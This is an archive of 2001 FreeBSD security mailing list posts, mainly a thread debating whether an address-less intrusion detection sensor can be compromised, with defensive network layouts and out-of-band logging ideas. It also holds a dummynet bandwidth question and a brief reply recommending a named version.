> hai guys,.
>
> i heard that dummynet can help us to manage bandwidth,..
> i wanna try it,.
> so give me some tutorial please,..
> how should i do,..
> and can u give me some example command for it,..
>
> by the way,. how about security
> is dummynet has ipfw rules ??
> does it will make user got a problem to access,..
> and,. does it secure like Firewall??
>
> i dunno,. so please help me guys,.
>
> thanks a lot
>
>
>
>
> >>>>>>>>>>>>>>>>>*****<<<<<<<<<<<<<<<<<
> riki@unila.ac.id
> visit my homepage and sign my guestbook
> http://unilanet.unila.ac.id/~qq
> ---------------------------------------
> ---------------------------------------
> &
> __& &__
> // \\
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sat Apr 7 8:52:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from green.dyndns.org (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id 5896537B42C; Sat, 7 Apr 2001 08:52:11 -0700 (PDT) (envelope-from green@FreeBSD.org) Received: from localhost (rlzvzr@localhost [127.0.0.1]) by green.dyndns.org (8.11.2/8.11.1) with ESMTP id f37Fosa31021; Sat, 7 Apr 2001 11:50:55 -0400 (EDT) (envelope-from green@FreeBSD.org) Message-Id: <200104071550.f37Fosa31021@green.dyndns.org> X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 To: lee@kechara.net Cc: freebsd-security@FreeBSD.org Subject: Re: Theory Question In-Reply-To: Message from Lee Smallbone of "Sat, 07 Apr 2001 16:00:40 BST." <200104071610.RAA18117@mailgate.kechara.net> 
From: "Brian F. Feldman" Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sat, 07 Apr 2001 11:50:54 -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Lee Smallbone wrote: > Hi there, > > I have a theory that I'd like to run past you guys if I may. We have an IDS watching over our network, and currently > it logs to itself, and has a publicly accessible IP address. Now what I want to do is get it to also log to a second > machine, privately addressed, and remove the public IP address from the IDS, and use the private machine to run > stats on and so forth. The primary concern is security. I am of the belief that a machine with no IP address cannot > be 'hacked' (externally), is this true in the real world? > > The setup would look a little like this. > > > (my apologies to those of you who do not have fixed-width fonts. See attachment if they're allowed here) > > /------\ > /Internet\-----[router]-------[switch]----[various servers] > / \ | | > ------------ | | > | | > [IDS] | > | [firewall] > | | > | | > | | > \ [switch] > \ / \ > \ / \ > \ / \ > \ / \ > \ / [internal lan] > \ / 192.168.1.x > [IDS Log 2] > 192.168.1.x > > > Would the direct link to the Internal network pose a threat to the rest of the Internal Lan? > Bearing in mind the IDS wouldn't have an IP address? > > Any input appreciated. How is the IDS logging to another machine without any IP address? To do it in a reasonable way, give it two network interfaces, one on the outside and one on the inside. The IDS machine needs to have no form of bridging enabled, of course, and have the public interface used for sniffing to have no address of its own. The IDS acts enough like a firewall (passing nothing that's not its own through) to stick the IDS's other interface directly on the internal switch. The IDS logging machine can be off the same switch and then wouldn't need two network cards like it did in the design you propose. 
Also, if all your router would be doing there is mirroring traffic in and out to the IDS, you may want to think more carefully about whether you really need both that router and that switch there.

--
 Brian Fundakowski Feldman           \  FreeBSD: The Power to Serve!  /
 green@FreeBSD.org                    `------------------------------'

From owner-freebsd-security Sat Apr 7 10: 3:48 2001
To: George.Giles@mcmail.vanderbilt.edu
Cc: security@FreeBSD.ORG
Subject: Re: named question
From: Dag-Erling Smorgrav
Date: 07 Apr 2001 19:03:42 +0200

George.Giles@mcmail.vanderbilt.edu writes:
> Which is recommended:
>
> named-8.2.3-T6B (FreeBSD 4.2) or
> named-8.2.3-REL from ISC

named-8.2.3 (FreeBSD 4-STABLE).

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Sat Apr 7 12:20:24 2001
Date: Sat, 7 Apr 2001 14:19:31 -0500 (CDT)
From: James Wyatt
To: Lee Smallbone
Cc: freebsd-security@freebsd.org
Subject: Re: Theory Question

> In practice, not a question...

From owner-freebsd-security Sat Apr 7 13:17: 5 2001
Date: Sat, 7 Apr 2001 16:16:44 -0400
From: Mipam
To: Lee Smallbone
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Theory Question

> I am of the belief that a machine with no IP address cannot
> be 'hacked' (externally), is this true in the real world?

Well .. not by any ip traffic for sure, but if it serves as a bridge between certain segments and serves as firewall for example, then you could try to flood it :) by sending loads of traffic to the machines behind it. But in this case it only operates on the layer below the ip layer, for it only looks to mac addresses to forward traffic, but it also does filtering on ip layer .... That's wrong, well, it's a nice solution for making it practically impossible to hack the machine from outside the network. (Plz i ain't try to start a religious war here, just some thoughts of my own for what they're worth).

>   /------\
>  /Internet\-----[router]-------[switch]----[various servers]
> /          \       |              |
> ------------       |              |
>                    |              |
>                  [IDS]            |
>                    |          [firewall]
>                    |              |
>                    |              |
>                    |              |
>                     \          [switch]
>                      \           /  \
>                       \         /    \
>                        \       /      \
>                         \     /        \
>                          \   /      [internal lan]
>                           \ /        192.168.1.x
>                       [IDS Log 2]
>                       192.168.1.x

Hmm, looks a bit weird to me. So you're gonna tell the router that all traffic also has to be passed out on the interface to which the ids machine is connected? Why not like this:

router | \ | switch | (dmz (screened subnet)) | / | | | \ | / ids | / firewall | switch | \ internal lan ids

Now also do some filtering on the router so that the dmz is not completely unprotected.
Tell the switches to mirror all the traffic from its other ports to that of the ids. Just give the ids ip addresses (not strictly necessary). And close all udp/tcp ports (only if it has an ip address) on it and block icmp traffic (for the paranoid). All the ids has to do is to listen passively and not generate any traffic at all. You could of course allow ssh2 to the ids from certain internal ip's. But then also allow icmp 3/4 from the firewall to the ids, for the case that the firewall in between can't handle the same mtu as the ids ... (... ahem). For logging to other machines you need to allow ip traffic to the ids indeed. But if you wish to do that, you surely must give the ids's an ip. This is far, far from complete etc, but that was not my intention anyway. Just some suggestions.

Bye,

Mipam.

From owner-freebsd-security Sat Apr 7 14:17:54 2001
Date: Sat, 07 Apr 2001 14:17:46 -0700
From: "Crist Clark"
To: lee@kechara.net
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Theory Question

Lee Smallbone wrote:
>
> Hi there,
>
> I have a theory that I'd like to run past you guys if I may. We have an IDS watching over our network, and currently
> it logs to itself, and has a publicly accessible IP address. Now what I want to do is get it to also log to a second
> machine, privately addressed, and remove the public IP address from the IDS, and use the private machine to run
> stats on and so forth. The primary concern is security. I am of the belief that a machine with no IP address cannot
> be 'hacked' (externally), is this true in the real world?

No. There is no such thing as a box on a network that 'cannot be hacked.'

A possible scenario: Your IDS is listening to the unprotected link to the Internet and chugging away, crunching the data passing by looking for attack signatures. Hiding somewhere in the bowels of this large and complex IDS program[0] is a buffer overflow vulnerability. EvulHax0r sends a crafted series of packets past the box which trip the buffer overflow and execute arbitrary code of his choosing on the box. Game over. His code could attach an IP stack to the external interface (just run ifconfig), it could open a tunnel through the backside of the IDS and back out of the front[1] of your network, or if EvulHax0r is really 33l33t, he could set up a covert channel on the external interface that does not use the kernel stack.

This is all possible, but not probable. You must weigh the risks and benefits of having the IDS setup in this manner versus other configurations. Security is almost always a series of trade offs.
The only absolutely secure network configuration is not to have the device connected to the network at all. There is no such thing as a box on a network that 'cannot be hacked.'

[0] An IDS program does not need to be all that big and complex to have vulnerable code hiding in it. Both Snort and tcpdump have had their share of exploitable buffer overruns.

[1] Note that in this situation, going that extra step of physically disabling transmission of data on the external interface (snipping or shorting wires) will not save you either.

--
Crist J. Clark                      Network Security Engineer
crist.clark@globalstar.com          Globalstar, L.P.
(408) 933-4387                      FAX: (408) 933-4926

The information contained in this e-mail message is confidential, intended only for the use of the individual or entity named above. If the reader of this e-mail is not the intended recipient, or the employee or agent responsible to deliver it to the intended recipient, you are hereby notified that any review, dissemination, distribution or copying of this communication is strictly prohibited. If you have received this e-mail in error, please contact postmaster@globalstar.com

From owner-freebsd-security Sat Apr 7 14:25:58 2001
Date: Sat, 7 Apr 2001 16:25:52 -0500
From: "Jacques A. Vidrine"
To: Crist Clark
Cc: lee@kechara.net, freebsd-security@FreeBSD.ORG
Subject: Re: Theory Question

On Sat, Apr 07, 2001 at 02:17:46PM -0700, Crist Clark wrote:
> A possible scenario: Your IDS is listening to the unprotected link to
> the Internet and chugging away, crunching the data passing by looking
> for attack signatures. Hiding somewhere in the bowels of this large
> and complex IDS program[0] is a buffer overflow vulnerability. EvulHax0r
> sends a crafted series of packets past the box which trip the buffer
> overflow and execute arbitrary code of his choosing on the box. Game
> over. His code could attach an IP stack to the external interface
> (just run ifconfig), it could open a tunnel through the backside of
> the IDS and back out of the front[1] of your network, or if EvulHax0r
> is really 33l33t, he could set up a covert channel on the external
> interface that does not use the kernel stack.

This is why you physically cut the TX wires to the network. That buffer overflow can still be successful, and the machine can still be compromised, but it cannot be used to make further attacks. The types of compromises are also limited, since the attacker must work blindly.

Of course, the problem is then how do you get useful information out of your IDS?
Cheers,
--
Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org

From owner-freebsd-security Sat Apr 7 14:48:17 2001
Date: Sat, 07 Apr 2001 14:48:13 -0700
From: "Crist Clark"
To: "Jacques A. Vidrine"
Cc: lee@kechara.net, freebsd-security@FreeBSD.ORG
Subject: Re: Theory Question

"Jacques A. Vidrine" wrote:
>
> On Sat, Apr 07, 2001 at 02:17:46PM -0700, Crist Clark wrote:
> > A possible scenario: Your IDS is listening to the unprotected link to
> > the Internet and chugging away, crunching the data passing by looking
> > for attack signatures. Hiding somewhere in the bowels of this large
> > and complex IDS program[0] is a buffer overflow vulnerability. EvulHax0r
> > sends a crafted series of packets past the box which trip the buffer
> > overflow and execute arbitrary code of his choosing on the box. Game
> > over. His code could attach an IP stack to the external interface
> > (just run ifconfig), it could open a tunnel through the backside of
> > the IDS and back out of the front[1] of your network, or if EvulHax0r
> > is really 33l33t, he could set up a covert channel on the external
> > interface that does not use the kernel stack.
>
> This is why you physically cut the TX wires to the network. That buffer
> overflow can still be successful, and the machine can still be
> compromised, but it cannot be used to make further attacks. The types
> of compromises are also limited, since the attacker must work blindly.

As I pointed out, it may be possible to use the machine for further attacks even with physically disabling transmission on the external interface. One could conceive of quite a number of ways to establish a tunnel from the internal interface of the IDS, through the firewall, and back out onto the Internet.
> Of course, the problem is then how do you get useful information out of
> your IDS?

Were you indicating to disable transmission on the internal interface? Then why hook it up to the internal network at all? That defeats the purpose of the original poster's design.

Going back to the original problem, IMHO, if you want to have data connectivity with the IDS, a fairly secure way to go is to have one or more serial connections to the IDS from the inside.

          }                      {
 Internet }----+---[Firewall]----{ Protected network
          }    |                 {       |
             [IDS]..................[IDS Mngmnt]
                   (serial line(s))

For example, you could have one console connection and one data connection passing the logging info. The possibility of an attacker gaining further access into your network if the IDS is compromised is small (but as always, non-zero), and you have all of the access you need to the system. The one caveat being the data rate limitation on a serial line. (And serial lines are even worse when it comes to TEMPEST, but not too many people need concern themselves with that.)

--
Crist J. Clark                      Network Security Engineer
crist.clark@globalstar.com          Globalstar, L.P.
(408) 933-4387                      FAX: (408) 933-4926

From owner-freebsd-security Sat Apr 7 14:49: 8 2001
From: "John Howie"
To: "Jacques A. Vidrine", "Crist Clark"
Subject: Re: Theory Question
Date: Sat, 7 Apr 2001 14:53:11 -0700

I didn't see anyone state the obvious: have a separate monitoring network that is not attached to your production (i.e. behind the interior DMZ firewall) network. If the IDS box is compromised then it could be used to launch attacks against other connected networks. By having it on a separate monitoring network you prevent this scenario.

In practice a machine with no IP address that just receives packets is not likely to be vulnerable. Crist's scenario is not a probable one (as he, himself, acknowledges). However, you might find yourself in a situation where a DoS is created against the IDS itself which means that it won't recognise the activity it was deployed to catch.

john...

----- Original Message -----
From: "Jacques A. Vidrine"
To: "Crist Clark"
Sent: Saturday, April 07, 2001 2:25 PM
Subject: Re: Theory Question

> On Sat, Apr 07, 2001 at 02:17:46PM -0700, Crist Clark wrote:
> > A possible scenario: Your IDS is listening to the unprotected link to
> > the Internet and chugging away, crunching the data passing by looking
> > for attack signatures. Hiding somewhere in the bowels of this large
> > and complex IDS program[0] is a buffer overflow vulnerability. EvulHax0r
> > sends a crafted series of packets past the box which trip the buffer
> > overflow and execute arbitrary code of his choosing on the box. Game
> > over. His code could attach an IP stack to the external interface
> > (just run ifconfig), it could open a tunnel through the backside of
> > the IDS and back out of the front[1] of your network, or if EvulHax0r
> > is really 33l33t, he could set up a covert channel on the external
> > interface that does not use the kernel stack.
>
> This is why you physically cut the TX wires to the network. That buffer
> overflow can still be successful, and the machine can still be
> compromised, but it cannot be used to make further attacks. The types
> of compromises are also limited, since the attacker must work blindly.
>
> Of course, the problem is then how do you get useful information out of
> your IDS?
>
> Cheers,
> --
> Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org

From owner-freebsd-security Sat Apr 7 15: 6: 4 2001
From: "John Howie"
To: "Crist Clark", "Jacques A. Vidrine"
Subject: Re: Theory Question
Date: Sat, 7 Apr 2001 15:10:13 -0700

----- Original Message -----
From: "Crist Clark"
To: "Jacques A. Vidrine"
Sent: Saturday, April 07, 2001 2:48 PM
Subject: Re: Theory Question

[stuff edited out...]

> Going back to the original problem, IMHO, if you want to have data
> connectivity with the IDS, a fairly secure way to go is to have one
> or more serial connections to the IDS from the inside.
>
>           }                      {
>  Internet }----+---[Firewall]----{ Protected network
>           }    |                 {       |
>              [IDS]..................[IDS Mngmnt]
>                    (serial line(s))
>
> For example, you could have one console connection and one data connection
> passing the logging info. The possibility of an attacker gaining further
> access into your network if the IDS is compromised is small (but as always,
> non-zero), and you have all of the access you need to the system. The one
> caveat being the data rate limitation on a serial line. (And serial lines
> are even worse when it comes to TEMPEST, but not too many people need
> concern themselves with that.)

Just don't run PPP or SLIP over the serial line (don't laugh, I've seen just this setup and yes, it was compromised).

john...

From owner-freebsd-security Sat Apr 7 15:37:40 2001
Date: Sat, 7 Apr 2001 17:37:32 -0500
From: "Jacques A. Vidrine"
To: Crist Clark
Cc: lee@kechara.net, freebsd-security@FreeBSD.ORG
Subject: Re: Theory Question

On Sat, Apr 07, 2001 at 02:48:13PM -0700, Crist Clark wrote:
> "Jacques A. Vidrine" wrote:
> Were you indicating to disable transmission on the internal interface?

On `the' interface.

> Then why hook it up to the internal network at all? That defeats the
> purpose of the original poster's design.

I didn't look at the original poster's design. I was referring to an IDS that passively listened to the network. Any other communication with the IDS has to happen out-of-band.

Cheers,
--
Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org

From owner-freebsd-security Sat Apr 7 15:39:13 2001
Date: Sat, 7 Apr 2001 17:39:10 -0500
From: "Jacques A. Vidrine"
To: John Howie
Cc: Crist Clark, lee@kechara.net, freebsd-security@FreeBSD.ORG
Subject: Re: Theory Question

On Sat, Apr 07, 2001 at 02:53:11PM -0700, John Howie wrote:
> In practice a machine with no IP address that just receives packets is not
> likely to be vulnerable. Crist's scenario is not a probable one (as he,
> himself, acknowledges).

Such exploits have been seen in the past, e.g. the tcpdump buffer overrun. I guess the assumption is that your opponent is more sophisticated than a script kiddie, and wants something in your network.
Cheers,
--
Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org

From owner-freebsd-security Sat Apr 7 15:44:43 2001
From: "John Howie"
To: "Jacques A. Vidrine"
Cc: "Crist Clark"
Subject: Re: Theory Question
Date: Sat, 7 Apr 2001 15:48:53 -0700

----- Original Message -----
From: "Jacques A. Vidrine"
To: "John Howie"
Cc: "Crist Clark"
Sent: Saturday, April 07, 2001 3:39 PM
Subject: Re: Theory Question

> On Sat, Apr 07, 2001 at 02:53:11PM -0700, John Howie wrote:
> > In practice a machine with no IP address that just receives packets is not
> > likely to be vulnerable. Crist's scenario is not a probable one (as he,
> > himself, acknowledges).
>
> Such exploits have been seen in the past, e.g. the tcpdump buffer
> overrun. I guess the assumption is that your opponent is more
> sophisticated than a script kiddie, and wants something in your
> network.
>

Agreed! And the hacker would also need to have intimate knowledge of your network configuration to be able to supply the correct parameters to ifconfig in the scenario that Crist outlined. One item that was missing from the original design was an exterior DMZ firewall (or perhaps I just missed that component) running NAT. Key to securing the infrastructure is making it as difficult as possible for a hacker to determine DMZ and production network topologies and machine addresses.

Regards,

john...

From owner-freebsd-security Sat Apr 7 16: 0:45 2001
Date: Sat, 7 Apr 2001 18:00:40 -0500
From: "Jacques A. Vidrine"
To: John Howie
Cc: Crist Clark, lee@kechara.net, freebsd-security@FreeBSD.ORG
Subject: Re: Theory Question

On Sat, Apr 07, 2001 at 03:48:53PM -0700, John Howie wrote:
> Agreed! And the hacker would also need to have intimate knowledge of your
> network configuration to be able to supply the correct parameters to
> ifconfig in the scenario that Crist outlined.

Well, no. Arbitrary code is just that: arbitrary. Arbitrary code can determine a working configuration for any network interface. And in many cases it will not even be necessary to `ifconfig' the interface to use it.

> One item that was missing from
> the original design was an exterior DMZ firewall (or perhaps I just missed
> that component) running NAT. Key to securing the infrastructure is making it
> as difficult as possible for a hacker to determine DMZ and production
> network topologies and machine addresses.

If the `key' to your security is obscurity of your internal network configuration, expect to be compromised. This information is not hard to obtain by a determined attacker, and technology is probably not even an issue.
Cheers,
--
Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org

From owner-freebsd-security Sat Apr 7 16:12:47 2001
Delivered-To: freebsd-security@freebsd.org
Received: from cpimssmtpoa04.msn.com (cpimssmtpoa04.msn.com [207.46.181.114]) by hub.freebsd.org (Postfix) with ESMTP id 775F837B424 for ; Sat, 7 Apr 2001 16:12:44 -0700 (PDT) (envelope-from JHowie@msn.com)
Received: from cpimssmtpu13.email.msn.com ([207.46.181.88]) by cpimssmtpoa04.msn.com with Microsoft SMTPSVC(5.0.2195.3225); Sat, 7 Apr 2001 16:12:43 -0700
Received: from x86w2kw1 ([216.103.48.12]) by cpimssmtpu13.email.msn.com with Microsoft SMTPSVC(5.0.2195.3225); Sat, 7 Apr 2001 16:12:42 -0700
Message-ID: <05b901c0bfb8$d79a1160$0101a8c0@development.local>
From: "John Howie"
To: "Jacques A. Vidrine"
Cc: "Crist Clark" , ,
References: <200104071610.RAA18117@mailgate.kechara.net> <3ACF83FA.55761A7B@globalstar.com> <20010407162552.D87286@hamlet.nectar.com> <058701c0bfad$265e8530$0101a8c0@development.local> <20010407173910.B69155@spawn.nectar.com> <05aa01c0bfb4$ec3a0de0$0101a8c0@development.local> <20010407180040.B87468@hamlet.nectar.com>
Subject: Re: Theory Question
Date: Sat, 7 Apr 2001 16:16:55 -0700
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
X-OriginalArrivalTime: 07 Apr 2001 23:12:43.0001 (UTC) FILETIME=[3FB3CE90:01C0BFB8]
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Jacques,

You are missing my points (or perhaps I typed too fast to make them clearly). Crist supplied the ifconfig scenario, I just followed up on it, and I thought we were still talking about script kiddies. That said, security can still be strengthened through obscurity but as you quite correctly point out it cannot solely be relied upon. If I force would-be intruders to have to defeat/circumvent individual measures such as firewalls/NAT boxes just to determine my topologies before they can even make an attempt at an attack on servers, then most will give up and go away. With the correct supporting measures in place, obscuring network topology is a valid step to take.

john...

----- Original Message -----
From: "Jacques A. Vidrine"
To: "John Howie"
Cc: "Crist Clark" ; ;
Sent: Saturday, April 07, 2001 4:00 PM
Subject: Re: Theory Question

> On Sat, Apr 07, 2001 at 03:48:53PM -0700, John Howie wrote:
> > Agreed! And the hacker would also need to have intimate knowledge of your
> > network configuration to be able to supply the correct parameters to
> > ifconfig in the scenario that Crist outlined.
>
> Well, no. Arbitrary code is just that: arbitrary. Arbitrary code can
> determine a working configuration for any network interface. And in
> many cases it will not even be necessary to `ifconfig' the interface
> to use it.
>
> > One item that was missing from
> > the original design was an exterior DMZ firewall (or perhaps I just missed
> > that component) running NAT. Key to securing the infrastructure is making it
> > as difficult as possible for a hacker to determine DMZ and production
> > network topologies and machine addresses.
>
> If the `key' to your security is obscurity of your internal network
> configuration, expect to be compromised. This information is not hard
> to obtain by a determined attacker, and technology is probably not
> even an issue.
>
> Cheers,
> --
> Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org

From owner-freebsd-security Sat Apr 7 17:30:14 2001
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id F389F37B43E; Sat, 7 Apr 2001 17:30:10 -0700 (PDT) (envelope-from brett@lariat.org)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id SAA13994; Sat, 7 Apr 2001 18:30:05 -0600 (MDT)
Message-Id: <4.3.2.7.2.20010407182641.0443b910@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Sat, 07 Apr 2001 18:29:51 -0600
To: "Brian F. Feldman" , lee@kechara.net
From: Brett Glass
Subject: Re: Theory Question
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <200104071550.f37Fosa31021@green.dyndns.org>
References: <200104071610.RAA18117@mailgate.kechara.net>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 09:50 AM 4/7/2001, Brian F. Feldman wrote:
>How is the IDS logging to another machine without any IP address?

You could do it with PPPoE. There'd be no visible IP address, only a MAC address. You could also use something like LAT. Most modern day "Haxors" have never even heard of it.

--Brett

From owner-freebsd-security Sat Apr 7 20:18:25 2001
Delivered-To: freebsd-security@freebsd.org
Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 7F30837B422 for ; Sat, 7 Apr 2001 20:18:19 -0700 (PDT) (envelope-from jwyatt@rwsystems.net)
Received: from bsdie.rwsystems.net([209.197.223.2]) (4113 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Sat, 7 Apr 2001 22:17:03 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25)
Date: Sat, 7 Apr 2001 22:16:52 -0500 (CDT)
From: James Wyatt
To: John Howie
Cc: "Jacques A. Vidrine" , Crist Clark , lee@kechara.net, freebsd-security@FreeBSD.ORG
Subject: Re: Theory Question
In-Reply-To: <058701c0bfad$265e8530$0101a8c0@development.local>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

If you have a large network to protect, maintaining a separate monitoring network for out-of-band control (of the main network which is subject to attack) can be pretty costly. I've seen VLANs suggested for large outfits, but that can be attacked at the switch level. You can use voice channels and PPP over serial, but filter the heck out of it and don't set a default route. At some point you will have to network to your IDS box if you want much functionality from it. If you simply have the box set to log out the serial port, it can be easily overrun (DoSed) if you have a good net connection. If you do enough, the easiest attack is to plant a contractor on your staff and have them work from the inside out anyway...

- Jy@

On Sat, 7 Apr 2001, John Howie wrote:
> I didn't see anyone state the obvious: have a separate monitoring network
> that is not attached to your production (i.e. behind the interior DMZ
> firewall) network. If the IDS box is compromised then it could be used to
> launch attacks against other connected networks. By having it on a separate
> monitoring network you prevent this scenario.
>
> In practice a machine with no IP address that just receives packets is not
> likely to be vulnerable. Crist's scenario is not a probable one (as he,
> himself, acknowledges). However, you might find yourself in a situation
> where a DoS is created against the IDS itself which means that it won't
> recognise the activity it was deployed to catch.
>
> john...
>
>
> ----- Original Message -----
> From: "Jacques A. Vidrine"
> To: "Crist Clark"
> Cc: ;
> Sent: Saturday, April 07, 2001 2:25 PM
> Subject: Re: Theory Question
>
>
> > On Sat, Apr 07, 2001 at 02:17:46PM -0700, Crist Clark wrote:
> > > A possible scenario: Your IDS is listening to the unprotected link to
> > > the Internet and chugging away, crunching the data passing by looking
> > > for attack signatures. Hiding somewhere in the bowels of this large
> > > and complex IDS program[0] is a buffer overflow vulnerability. EvulHax0r
> > > sends a crafted series of packets past the box which trip the buffer
> > > overflow and execute arbitrary code of his choosing on the box. Game
> > > over. His code could attach an IP stack to the external interface
> > > (just run ifconfig), it could open a tunnel through the backside of
> > > the IDS and back out of the front[1] of your network, or if EvulHax0r
> > > is really 33l33t, he could set up a covert channel on the external
> > > interface that does not use the kernel stack.
> >
> > This is why you physically cut the TX wires to the network. That buffer
> > overflow can still be successful, and the machine can still be
> > compromised, but it cannot be used to make further attacks. The types
> > of compromises are also limited, since the attacker must work blindly.
> >
> > Of course, the problem is then how do you get useful information out of
> > your IDS?
> >
> > Cheers,
> > --
> > Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org